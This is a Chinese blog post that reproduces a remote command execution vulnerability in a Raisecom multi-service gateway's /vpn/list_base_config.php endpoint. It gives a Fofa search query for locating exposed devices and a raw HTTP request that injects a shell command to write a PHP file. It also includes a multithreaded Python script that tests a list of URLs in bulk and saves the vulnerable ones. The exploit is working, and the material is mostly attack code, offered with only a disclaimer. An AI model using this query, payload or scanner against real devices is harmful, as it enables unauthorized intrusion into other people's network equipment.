瑞某康达科技发展股份有限公司-多业务智能网关存RCE漏洞

于 2024-09-18 09:00:00 发布
阅读量124 收藏 1
点赞数 5
分类专栏: 漏洞复现 网络安全 文章标签: 网络安全 web安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/142215245
版权

一、漏洞简介

   融合型多业务智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络产品。该产品集数据、语音、安全、无线等功能于一体,能够为用户提供一个综合、完整的网络接入解决方案。漏洞位置位于/vpn/list_base_config.php接口未对用户提交的参数进行限制和校验,导致攻击者可以通过该接口参数写入php文件并访问,导致远程命令执行漏洞。

(声明:任何利用该漏洞进行非法攻击的,和本博客无关,使用者自己承担相应责任!!!!)

二、资产测绘

Fofa:
body="/images/raisecom/back.gif" && title=="Web user login"

三、POC信息

1、写入php文件:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

访问/tmp/test.php即可验证漏洞

四、漏洞批量验证脚本

import requests
import urllib3
from requests import RequestException
from bs4 import BeautifulSoup
import threading


urllib3.disable_warnings()
result_list = []

def poc(url):
    Path = url.strip()+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>/www/tmp/test.php`"
    Header = {
        "referer": "https://segmentfault.com/",
        "Sec-ch-ua": '"Not)A;Brand";v="99", " MicrosoftEdge";v="127", " Chromium";v="127"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0"
    }
    try:
        response = requests.get(url=Path,headers=Header,verify=False,timeout=3)
        if response.status_code == 200:
            try:
                file_check = requests.get(url=(url.strip()+"/tmp/test.php"),headers=Header,verify=False,timeout=3)

                soup = BeautifulSoup(file_check.content,'html.parser')
                php_Extension = soup.find(string="PHP Extension")
                registered_Streams = soup.find(string="Registered PHP Streams")
                registered_Trans = soup.find(string = "Registered Stream Socket Transports")
                if file_check.status_code == 200 and(php_Extension or registered_Trans or registered_Streams):
                    print(f"{url}存在文件写入导致RCE")
                    result_list.append(url.strip()+"\n")

            except RequestException  as k:
                pass


    except RequestException as e:
        pass


def Mult_threading():
    threads = []
    with open("url.txt",'r') as urls:
        for url in urls:
            Thread = threading.Thread(target=poc,args=(url,))
            threads.append(Thread)
            Thread.start()
        for i in threads:
            i.join()

if __name__ == '__main__':
    Mult_threading()
    with open("result.txt",'w') as file:
        for i in result_list:
            file.write(i.strip()+"\n")

网安第一深禽
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值